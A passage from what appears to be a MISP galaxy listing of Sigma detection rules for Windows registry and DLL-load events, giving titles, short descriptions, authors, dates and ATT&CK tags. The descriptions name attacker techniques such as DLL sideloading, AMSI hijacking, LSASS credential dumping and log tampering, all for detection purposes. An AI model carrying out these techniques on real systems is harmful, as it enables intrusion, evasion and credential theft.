
To see the related clusters, click here.

Potential WerFault ReflectDebugger Registry Value Abuse

Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.

Internal MISP references

UUID 0cf2e1c6-8d10-4273-8059-738778f981ad which can be used as unique global reference for Potential WerFault ReflectDebugger Registry Value Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior
creation_date 2023/05/18
falsepositive ['Unknown']
filename registry_set_persistence_reflectdebugger.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Disable Windows Security Center Notifications

Detect set UseActionCenterExperience to 0 to disable the Windows security center notification

Internal MISP references

UUID 3ae1a046-f7db-439d-b7ce-b8b366b81fa6 which can be used as unique global reference for Disable Windows Security Center Notifications in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/19
falsepositive ['Unknown']
filename registry_set_disable_security_center_notifications.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Event Viewer Events.asp

Detects potential registry persistence technique using the Event Viewer "Events.asp" technique

Internal MISP references

UUID a1e11042-a74a-46e6-b07c-c4ce8ecc239b which can be used as unique global reference for Potential Persistence Via Event Viewer Events.asp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/17
falsepositive ['Unknown']
filename registry_set_persistence_event_viewer_events_asp.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Hide Schedule Task Via Index Value Tamper

Detects when the "index" value of a scheduled task is modified from the registry Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique)

Internal MISP references

UUID 5b16df71-8615-4f7f-ac9b-6c43c0509e61 which can be used as unique global reference for Hide Schedule Task Via Index Value Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/26
falsepositive ['Unlikely']
filename registry_set_hide_scheduled_task_via_index_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Potential AutoLogger Sessions Tampering

Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging

Internal MISP references

UUID f37b4bce-49d0-4087-9f5b-58bffda77316 which can be used as unique global reference for Potential AutoLogger Sessions Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/01
falsepositive ['Unknown']
filename registry_set_disable_autologger_sessions.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

ETW Logging Disabled In .NET Processes - Sysmon Registry

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

Internal MISP references

UUID bf4fc428-dcc3-4bbd-99fe-2422aeee2544 which can be used as unique global reference for ETW Logging Disabled In .NET Processes - Sysmon Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/06/05
falsepositive ['Unknown']
filename registry_set_dot_net_etw_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Potential Persistence Via COM Hijacking From Suspicious Locations

Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unsuale location

Internal MISP references

UUID 3d968d17-ffa4-4bc0-bfdc-f139de76ce77 which can be used as unique global reference for Potential Persistence Via COM Hijacking From Suspicious Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/28
falsepositive ['Probable legitimate applications. If you find these please add them to an exclusion list']
filename registry_set_persistence_com_hijacking_susp_locations.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

Internet Explorer Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID a80f662f-022f-4429-9b8c-b1a41aaa6688 which can be used as unique global reference for Internet Explorer Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_internet_explorer.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Attempt Using New NetworkProvider - REG

Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it

Internal MISP references

UUID 0442defa-b4a2-41c9-ae2c-ea7042fc4701 which can be used as unique global reference for Potential Credential Dumping Attempt Using New NetworkProvider - REG in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/23
falsepositive ['Other legitimate network providers used and not filtred in this rule']
filename registry_set_new_network_provider.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.credential_access', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Potential Ransomware Activity Using LegalNotice Message

Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages

Internal MISP references

UUID 8b9606c9-28be-4a38-b146-0e313cc232c1 which can be used as unique global reference for Potential Ransomware Activity Using LegalNotice Message in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/11
falsepositive ['Unknown']
filename registry_set_legalnotice_susp_message.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.impact', 'attack.t1491.001']
Related clusters

To see the related clusters, click here.

Disable Internal Tools or Feature in Registry

Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)

Internal MISP references

UUID e2482f8d-3443-4237-b906-cc145d87a076 which can be used as unique global reference for Disable Internal Tools or Feature in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec
creation_date 2022/03/18
falsepositive ['Legitimate admin script']
filename registry_set_disable_function_user.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential AMSI COM Server Hijacking

Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless

Internal MISP references

UUID 160d2780-31f7-4922-8b3a-efce30e63e96 which can be used as unique global reference for Potential AMSI COM Server Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/04
falsepositive ['Unknown']
filename registry_set_amsi_com_hijack.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Register New IFiltre For Persistence

Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.

Internal MISP references

UUID b23818c7-e575-4d13-8012-332075ec0a2b which can be used as unique global reference for Register New IFiltre For Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Legitimate registration of IFilters by the OS or software']
filename registry_set_persistence_ifilter.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

VBScript Payload Stored in Registry

Detects VBScript content stored into registry keys as seen being used by UNC2452 group

Internal MISP references

UUID 46490193-1b22-4c29-bdd6-5bf63907216f which can be used as unique global reference for VBScript Payload Stored in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/03/05
falsepositive ['Unknown']
filename registry_set_vbs_payload_stored.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Via TypedPaths

Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt

Internal MISP references

UUID 086ae989-9ca6-4fe7-895a-759c5544f247 which can be used as unique global reference for Potential Persistence Via TypedPaths in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/22
falsepositive ['Unlikely']
filename registry_set_persistence_typed_paths.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

ServiceDll Hijack

Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.

Internal MISP references

UUID 612e47e9-8a59-43a6-b404-f48683f45bd6 which can be used as unique global reference for ServiceDll Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/04
falsepositive ['Administrative scripts', 'Installation of a service']
filename registry_set_servicedll_hijack.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Unsigned Module Loaded by ClickOnce Application

Detects unsigned module load by ClickOnce application.

Internal MISP references

UUID 060d5ad4-3153-47bb-8382-43e5e29eda92 which can be used as unique global reference for Unsigned Module Loaded by ClickOnce Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery
creation_date 2023/06/08
falsepositive ['Unlikely']
filename image_load_susp_clickonce_unsigned_module_loaded.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.persistence', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded

Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.

Internal MISP references

UUID bdc64095-d59a-42a2-8588-71fd9c9d9abc which can be used as unique global reference for Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Perez Diego (@darkquassar), oscd.community, Ecco
creation_date 2019/10/27
falsepositive ['Unknown']
filename image_load_dll_dbghelp_dbgcore_unsigned_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

WMIC Loading Scripting Libraries

Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the /FORMAT argument switch to download and execute an XSL file (i.e js, vbs, etc).

Internal MISP references

UUID 06ce37c2-61ab-4f05-9ff5-b1a96d18ae32 which can be used as unique global reference for WMIC Loading Scripting Libraries in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/10/17
falsepositive ['The command wmic os get lastboottuptime loads vbscript.dll', 'The command wmic os get locale loads vbscript.dll', "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights"]
filename image_load_wmic_remote_xsl_scripting_dlls.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1220']
Related clusters

To see the related clusters, click here.

Potential Goopdate.DLL Sideloading

Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe

Internal MISP references

UUID b6188d2f-b3c4-4d2c-a17d-9706e0851af0 which can be used as unique global reference for Potential Goopdate.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/15
falsepositive ['False positives are expected from Google Chrome installations running from user locations (AppData) and other custom locations. Apply additional filters accordingly.', 'Other third party chromium browsers located in AppData']
filename image_load_side_load_goopdate.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential appverifUI.DLL Sideloading

Detects potential DLL sideloading of "appverifUI.dll"

Internal MISP references

UUID ee6cea48-c5b6-4304-a332-10fc6446f484 which can be used as unique global reference for Potential appverifUI.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/20
falsepositive ['Unlikely']
filename image_load_side_load_appverifui.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential EACore.DLL Sideloading

Detects potential DLL sideloading of "EACore.dll"

Internal MISP references

UUID edd3ddc3-386f-4ba5-9ada-4376b2cfa7b5 which can be used as unique global reference for Potential EACore.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/08/03
falsepositive ['Unlikely']
filename image_load_side_load_eacore.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential 7za.DLL Sideloading

Detects potential DLL sideloading of "7za.dll"

Internal MISP references

UUID 4f6edb78-5c21-42ab-a558-fd2a6fc1fd57 which can be used as unique global reference for Potential 7za.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior
creation_date 2023/06/09
falsepositive ['Legitimate third party application located in "AppData" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed.']
filename image_load_side_load_7za.yml
level low
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load

Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.

Internal MISP references

UUID b439f47d-ef52-4b29-9a2f-57d8a96cb6b8 which can be used as unique global reference for WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/09/02
falsepositive ['Legitimate event consumers', 'Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button']
filename image_load_scrcons_wmi_scripteventconsumer.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.lateral_movement', 'attack.privilege_escalation', 'attack.persistence', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Via comctl32.dll

Detects potential DLL sideloading using comctl32.dll to obtain system privileges

Internal MISP references

UUID 6360757a-d460-456c-8b13-74cf0e60cceb which can be used as unique global reference for Potential DLL Sideloading Via comctl32.dll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)
creation_date 2022/12/16
falsepositive ['Unlikely']
filename image_load_side_load_comctl32.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Suspicious WSMAN Provider Image Loads

Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.

Internal MISP references

UUID ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94 which can be used as unique global reference for Suspicious WSMAN Provider Image Loads in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/06/24
falsepositive ['Unknown']
filename image_load_wsman_provider_image_load.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.lateral_movement', 'attack.t1021.003']
Related clusters

To see the related clusters, click here.

Potential ShellDispatch.DLL Sideloading

Detects potential DLL sideloading of "ShellDispatch.dll"

Internal MISP references

UUID 844f8eb2-610b-42c8-89a4-47596e089663 which can be used as unique global reference for Potential ShellDispatch.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/20
falsepositive ['Some installers may trigger some false positives']
filename image_load_side_load_shelldispatch.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential RjvPlatform.DLL Sideloading From Default Location

Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default.

Internal MISP references

UUID 259dda31-b7a3-444f-b7d8-17f96e8a7d0d which can be used as unique global reference for Potential RjvPlatform.DLL Sideloading From Default Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/09
falsepositive ['Unknown']
filename image_load_side_load_rjvplatform_default_location.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Suspicious Volume Shadow Copy Vssapi.dll Load

Detects the image load of VSS DLL by uncommon executables

Internal MISP references

UUID 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 which can be used as unique global reference for Suspicious Volume Shadow Copy Vssapi.dll Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/31
falsepositive ['Unknown']
filename image_load_dll_vssapi_susp_load.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Suspicious Renamed Comsvcs DLL Loaded By Rundll32

Detects rundll32 loading a renamed comsvcs.dll to dump process memory

Internal MISP references

UUID 8cde342c-ba48-4b74-b615-172c330f2e93 which can be used as unique global reference for Suspicious Renamed Comsvcs DLL Loaded By Rundll32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/14
falsepositive ['Unlikely']
filename image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.credential_access', 'attack.defense_evasion', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

UAC Bypass With Fake DLL

Attempts to load dismcore.dll after dropping it

Internal MISP references

UUID a5ea83a7-05a5-44c1-be2e-addccbbd8c03 which can be used as unique global reference for UAC Bypass With Fake DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Dmitry Uchakin
creation_date 2020/10/06
falsepositive ['Actions of a legitimate telnet client']
filename image_load_uac_bypass_via_dism.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

UAC Bypass Using Iscsicpl - ImageLoad

Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%

Internal MISP references

UUID 9ed5959a-c43c-4c59-84e3-d28628429456 which can be used as unique global reference for UAC Bypass Using Iscsicpl - ImageLoad in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/17
falsepositive ['Unknown']
filename image_load_uac_bypass_iscsicpl.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Potential Wazuh Security Platform DLL Sideloading

Detects potential DLL side loading of DLLs that are part of the Wazuh security platform

Internal MISP references

UUID db77ce78-7e28-4188-9337-cf30e2b3ba9f which can be used as unique global reference for Potential Wazuh Security Platform DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/03/13
falsepositive ['Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)']
filename image_load_side_load_wazuh.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential Vivaldi_elf.DLL Sideloading

Detects potential DLL sideloading of "vivaldi_elf.dll"

Internal MISP references

UUID 2092cacb-d77b-4f98-ab0d-32b32f99a054 which can be used as unique global reference for Potential Vivaldi_elf.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/08/03
falsepositive ['Unknown']
filename image_load_side_load_vivaldi_elf.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential Rcdll.DLL Sideloading

Detects potential DLL sideloading of rcdll.dll

Internal MISP references

UUID 6e78b74f-c762-4800-82ad-f66787f10c8a which can be used as unique global reference for Potential Rcdll.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/03/13
falsepositive ['Unknown']
filename image_load_side_load_rcdll.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

HackTool - SharpEvtMute DLL Load

Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs

Internal MISP references

UUID 49329257-089d-46e6-af37-4afce4290685 which can be used as unique global reference for HackTool - SharpEvtMute DLL Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/07
falsepositive ['Other DLLs with the same Imphash']
filename image_load_hktl_sharpevtmute.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Fax Service DLL Search Order Hijack

The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.

Internal MISP references

UUID 828af599-4c53-4ed2-ba4a-a9f835c434ea which can be used as unique global reference for Fax Service DLL Search Order Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author NVISO
creation_date 2020/05/04
falsepositive ['Unlikely']
filename image_load_side_load_ualapi.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential SolidPDFCreator.DLL Sideloading

Detects potential DLL sideloading of "SolidPDFCreator.dll"

Internal MISP references

UUID a2edbce1-95c8-4291-8676-0d45146862b3 which can be used as unique global reference for Potential SolidPDFCreator.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/05/07
falsepositive ['Unknown']
filename image_load_side_load_solidpdfcreator.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Unsigned DLL Loaded by Windows Utility

Detects windows utilities loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code.

Internal MISP references

UUID b5de0c9a-6f19-43e0-af4e-55ad01f550af which can be used as unique global reference for Unsigned DLL Loaded by Windows Utility in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2024/02/28
falsepositive ['Unknown']
filename image_load_susp_unsigned_dll.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.t1218.011', 'attack.t1218.010', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

WMI Persistence - Command Line Event Consumer

Detects WMI command line event consumers

Internal MISP references

UUID 05936ce2-ee05-4dae-9d03-9a391cf2d2c6 which can be used as unique global reference for WMI Persistence - Command Line Event Consumer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2018/03/07
falsepositive ['Unknown (data set is too small; further testing needed)']
filename image_load_wmi_persistence_commandline_event_consumer.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.t1546.003', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Unsigned Mfdetours.DLL Sideloading

Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.

Internal MISP references

UUID 948a0953-f287-4806-bbcb-3b2e396df89f which can be used as unique global reference for Unsigned Mfdetours.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/11
falsepositive ['Unlikely']
filename image_load_side_load_mfdetours_unsigned.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

VMGuestLib DLL Sideload

Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.

Internal MISP references

UUID 70e8e9b4-6a93-4cb7-8cde-da69502e7aff which can be used as unique global reference for VMGuestLib DLL Sideload in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/01
falsepositive ['FP could occur if the legitimate version of vmGuestLib already exists on the system']
filename image_load_side_load_vmguestlib.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Of Non-Existent DLLs From System Folders

Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.

Internal MISP references

UUID 6b98b92b-4f00-4f62-b4fe-4d1920215771 which can be used as unique global reference for Potential DLL Sideloading Of Non-Existent DLLs From System Folders in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), SBousseaden
creation_date 2022/12/09
falsepositive ['Unknown']
filename image_load_side_load_non_existent_dlls.yml
level high
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Of DBGCORE.DLL

Detects DLL sideloading of "dbgcore.dll"

Internal MISP references

UUID 9ca2bf31-0570-44d8-a543-534c47c33ed7 which can be used as unique global reference for Potential DLL Sideloading Of DBGCORE.DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
creation_date 2022/10/25
falsepositive ['Legitimate applications loading their own versions of the DLL mentioned in this rule']
filename image_load_side_load_dbgcore_dll.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Amsi.DLL Loaded Via LOLBIN Process

Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack

Internal MISP references

UUID 6ec86d9e-912e-4726-91a2-209359b999b9 which can be used as unique global reference for Amsi.DLL Loaded Via LOLBIN Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/01
falsepositive ['Unknown']
filename image_load_dll_amsi_suspicious_process.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion']

Potential AVKkid.DLL Sideloading

Detects potential DLL sideloading of "AVKkid.dll"

Internal MISP references

UUID 952ed57c-8f99-453d-aee0-53a49c22f95d which can be used as unique global reference for Potential AVKkid.DLL Sideloading in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/08/03
falsepositive ['Unknown']
filename image_load_side_load_avkkid.yml
level medium
logsource.category image_load
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.001', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Potential DLL Sideloading Via JsSchHlp

Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor

Internal MISP references

